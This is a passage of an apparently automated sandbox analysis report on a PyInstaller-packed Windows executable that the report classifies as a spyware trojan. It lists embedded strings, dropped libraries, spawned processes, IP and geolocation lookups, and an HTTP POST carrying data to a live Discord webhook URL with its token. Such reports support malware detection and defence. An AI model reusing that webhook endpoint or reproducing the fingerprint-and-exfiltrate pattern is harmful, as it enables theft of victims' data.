      Source: 322pVOVprx.exe, 00000001.00000003.347809627.0000023E9570C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349051665.0000023E95718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wiki.debian.org/XDGBaseDirectorySpecification#state
      Source: 322pVOVprx.exe, 00000000.00000003.296322944.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: 322pVOVprx.exe, 00000001.00000003.353899418.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357442719.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.351259701.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.362660689.0000023E96877000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355344001.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345206905.0000023E96872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
      Source: 322pVOVprx.exe, 00000000.00000003.296755649.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
      Source: 322pVOVprx.exe, 00000001.00000003.362660689.0000023E96888000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374277035.0000023E96888000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339805348.0000023E96887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
      Source: 322pVOVprx.exe, 00000001.00000003.357442719.0000023E96855000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96806000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.351259701.0000023E96847000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374418147.0000023E96922000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345206905.0000023E9683B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353899418.0000023E96848000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353952021.0000023E96854000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355344001.0000023E96855000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374217692.0000023E96856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
      Source: 322pVOVprx.exe, 00000001.00000003.301375405.0000023E95733000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.301438496.0000023E95733000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.369427040.0000023E952D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
      Source: 322pVOVprx.exe, 00000001.00000003.338425769.0000023E96C74000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338217959.0000023E96C62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)z
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)z
      Source: unknownHTTP traffic detected: POST /api/webhooks/1074508453810274374/Nec6TaE5xRyXOeI0D3jHDg3tbo5RD1960f-6jMKlmHAllaKTQLGGzUk77rAX2YBKF_Nt HTTP/1.1Accept-Encoding: identityContent-Length: 670Host: canary.discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
      Source: unknownDNS traffic detected: queries for: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.11Connection: close
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.11Connection: close
      Source: global trafficHTTP traffic detected: GET /jsonp/84.17.52.13 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.11Connection: close
      Source: global trafficHTTP traffic detected: GET /jsonp/84.17.52.13 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.11Connection: close
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.11Connection: close
      Source: global trafficHTTP traffic detected: GET /jsonp/84.17.52.13 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.11Connection: close
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.11Connection: close
      Source: global trafficHTTP traffic detected: GET /jsonp/84.17.52.13 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.11Connection: close
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC67140_2_00007FF6E5AC6714
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AD4E200_2_00007FF6E5AD4E20
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AD5D6C0_2_00007FF6E5AD5D6C
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AB67800_2_00007FF6E5AB6780
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5ACD7180_2_00007FF6E5ACD718
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC1E700_2_00007FF6E5AC1E70
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC65600_2_00007FF6E5AC6560
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5ACFA080_2_00007FF6E5ACFA08
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC0DB00_2_00007FF6E5AC0DB0
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC67140_2_00007FF6E5AC6714
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AB80A00_2_00007FF6E5AB80A0
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AD509C0_2_00007FF6E5AD509C
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5ACD0980_2_00007FF6E5ACD098
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AD58200_2_00007FF6E5AD5820
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC28000_2_00007FF6E5AC2800
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC4F500_2_00007FF6E5AC4F50
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC0FB40_2_00007FF6E5AC0FB4
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC6F980_2_00007FF6E5AC6F98
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AD31CC0_2_00007FF6E5AD31CC
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC11C00_2_00007FF6E5AC11C0
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5ACFA080_2_00007FF6E5ACFA08
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AD09B40_2_00007FF6E5AD09B4
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC09A00_2_00007FF6E5AC09A0
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AD2D300_2_00007FF6E5AD2D30
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC13C40_2_00007FF6E5AC13C4
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5ACCC040_2_00007FF6E5ACCC04
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC2C040_2_00007FF6E5AC2C04
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AD8B680_2_00007FF6E5AD8B68
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC0BA40_2_00007FF6E5AC0BA4
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AC8BA00_2_00007FF6E5AC8BA0
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AB1B900_2_00007FF6E5AB1B90
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: String function: 00007FF6E5AB2770 appears 41 times
      Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: 322pVOVprx.exe, 00000000.00000003.294996970.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.294848493.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.299239908.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.294514542.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.294101171.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.293726499.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.294323597.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.298846422.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.296755649.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.295133023.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.293967842.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.294578143.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.294419997.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.294685663.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.294784208.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.298979692.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.294226913.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs 322pVOVprx.exe
      Source: 322pVOVprx.exe, 00000000.00000003.297328877.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs 322pVOVprx.exe
      Source: C:\Users\user\Desktop\322pVOVprx.exeSection loaded: python3.dllJump to behavior
      Source: 322pVOVprx.exeReversingLabs: Detection: 42%
      Source: 322pVOVprx.exeVirustotal: Detection: 15%
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile read: C:\Users\user\Desktop\322pVOVprx.exeJump to behavior
      Source: 322pVOVprx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\322pVOVprx.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\322pVOVprx.exe C:\Users\user\Desktop\322pVOVprx.exe
      Source: C:\Users\user\Desktop\322pVOVprx.exeProcess created: C:\Users\user\Desktop\322pVOVprx.exe C:\Users\user\Desktop\322pVOVprx.exe
      Source: C:\Users\user\Desktop\322pVOVprx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\322pVOVprx.exeProcess created: C:\Users\user\Desktop\322pVOVprx.exe C:\Users\user\Desktop\322pVOVprx.exeJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602Jump to behavior
      Source: classification engineClassification label: mal64.troj.spyw.winEXE@6/78@12/7
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AB74B0 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF6E5AB74B0
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_01
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: 322pVOVprx.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: 322pVOVprx.exeStatic file information: File size 13686532 > 1048576
      Source: 322pVOVprx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 322pVOVprx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 322pVOVprx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 322pVOVprx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 322pVOVprx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 322pVOVprx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 322pVOVprx.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: 322pVOVprx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbNN source: 322pVOVprx.exe, 00000000.00000003.294514542.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: 322pVOVprx.exe, 00000000.00000003.298846422.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\_w\1\b\bin\amd64\_overlapped.pdb source: 322pVOVprx.exe, 00000000.00000003.294685663.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: 322pVOVprx.exe, 00000000.00000003.294101171.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\_w\1\b\bin\amd64\_multiprocessing.pdb source: 322pVOVprx.exe, 00000000.00000003.294578143.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: 322pVOVprx.exe, 00000000.00000003.294848493.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 322pVOVprx.exe, 00000000.00000003.293726499.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: 322pVOVprx.exe, 00000000.00000003.294784208.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\_w\1\b\bin\amd64\_asyncio.pdb source: 322pVOVprx.exe, 00000000.00000003.293967842.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: 322pVOVprx.exe, 00000000.00000003.299239908.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: 322pVOVprx.exe, 00000000.00000003.294419997.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: 322pVOVprx.exe, 00000000.00000003.294514542.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
      Source: 322pVOVprx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 322pVOVprx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 322pVOVprx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 322pVOVprx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 322pVOVprx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5B010E4 push rcx; retn 0000h0_2_00007FF6E5B010ED
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5B010CC push rbp; retn 0000h0_2_00007FF6E5B010CD
      Source: 322pVOVprx.exeStatic PE information: section name: _RDATA
      Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
      Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
      Source: python311.dll.0.drStatic PE information: section name: PyRuntim
      Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
      Source: VCRUNTIME140.dll.0.drStatic PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_BLAKE2s.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_ghash_portable.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_MD5.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_cbc.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA384.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\_decimal.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_ofb.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\libffi-8.dllJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_Salsa20.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\sqlite3.dllJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\python311.dllJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\_bz2.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ec_ws.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\_cffi_backend.cp311-win_amd64.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\unicodedata.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\_overlapped.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_BLAKE2b.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ed448.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_cast.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA224.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_des3.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA512.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_poly1305.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\_socket.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Math\_modexp.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\pyexpat.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\select.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\VCRUNTIME140.dllJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_x25519.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_ARC4.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\_hashlib.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_ctr.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_chacha20.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_aesni.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Protocol\_scrypt.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_aes.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\_queue.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_cfb.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\_ssl.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\libcrypto-1_1.dllJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_ocb.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\libssl-1_1.dllJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\_ctypes.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_MD2.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_arc2.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Util\_cpuid_c.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA1.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_keccak.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA256.pydJump to dropped file
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60602\_sqlite3.pydJump to dropped file
